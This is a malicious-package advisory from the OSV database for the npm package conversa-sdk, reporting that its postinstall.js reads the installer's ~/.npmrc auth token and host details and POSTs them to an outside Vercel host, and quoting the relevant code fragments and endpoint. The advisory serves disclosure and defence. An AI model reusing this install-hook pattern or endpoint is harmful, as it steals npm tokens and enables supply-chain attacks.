MAL-2026-6185

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/conversa-sdk/MAL-2026-6185.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-6185

Published

2026-06-19T04:57:48Z

Modified

2026-06-19T05:31:48.222853851Z

Summary

Malicious code in conversa-sdk (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (baaff1de63d44fd5f6b4fb1c5d3ebb4e9509d7581ff9afa5f339acad8f57aed0)

On npm install, postinstall.js unconditionally reads the installer's ~/.npmrc (which typically contains //registry.npmjs.org/:_authToken=...) along with the OS username, hostname, node version, and platform, and POSTs the combined payload as JSON to https://chatbot-lac-eight-78.vercel.app/api/validate. The relevant code is at postinstall.js:23 (fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8')) and postinstall.js:27-42 (JSON.stringify({ type: 'workspace_init', user: u.username, host: os.hostname(), npmrc,... }) sent via https.request({ hostname: 'chatbot-lac-eight-78.vercel.app', path: '/api/validate', method: 'POST' })). The README explicitly claims 'No home-directory writes / No network calls during install' — a deliberate cover story directly contradicted by the postinstall behavior. The destination is a generic Vercel preview-style hostname with no publisher identity matching the package. Stolen npm auth tokens grant the attacker publish rights to any package the installer maintains, enabling onward supply-chain pivot.

Database specific

{
    "malicious-packages-origins": [
        {
            "sha256": "9eb25af4493d35dea152523e50bcb419ce6e6147ba1725d8d5d15d20ff2a77a6",
            "source": "amazon-inspector",
            "modified_time": "2026-06-19T04:57:54Z",
            "versions": [
                "2.0.2"
            ],
            "id": "IN-MAL-2026-007051",
            "import_time": "2026-06-19T05:16:49.353152005Z"
        },
        {
            "sha256": "baaff1de63d44fd5f6b4fb1c5d3ebb4e9509d7581ff9afa5f339acad8f57aed0",
            "source": "amazon-inspector",
            "modified_time": "2026-06-19T04:57:48Z",
            "versions": [
                "1.0.9"
            ],
            "id": "IN-MAL-2026-007050",
            "import_time": "2026-06-19T05:16:49.197833796Z"
        }
    ]
}

References

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / conversa-sdk

Package

Name: conversa-sdk; View open source insights on deps.dev
Purl: pkg:npm/conversa-sdk

Affected ranges

Affected versions

1.*

1.0.9

2.*

2.0.2

Database specific

cwes

[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    },
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/conversa-sdk/MAL-2026-6185.json"

indicators

{
    "evidence_files": [
        {
            "sha256": "90b6bf2883402e4afa08dabfb7b6060aaf3edd3319a7455ad3a805d2dc73c553",
            "tlsh": "093142f345aed93747b44696e098a426ab67c305374ab870b15c014c6bc93dc4133afc",
            "path": "postinstall.js"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-IQLWC4QqDDK+pUZ6HfKVzgzz11G7JsFxGRMx+LdmQTb4KSpU3/TiWkG0Ym7jLHa37yrYqPiui9cD/jVtm3zgnw==",
                "sha1": "cb06df99f1333774140ee036080b21762d83233b"
            },
            "filename": "conversa-sdk-2.0.2.tgz"
        }
    ]
}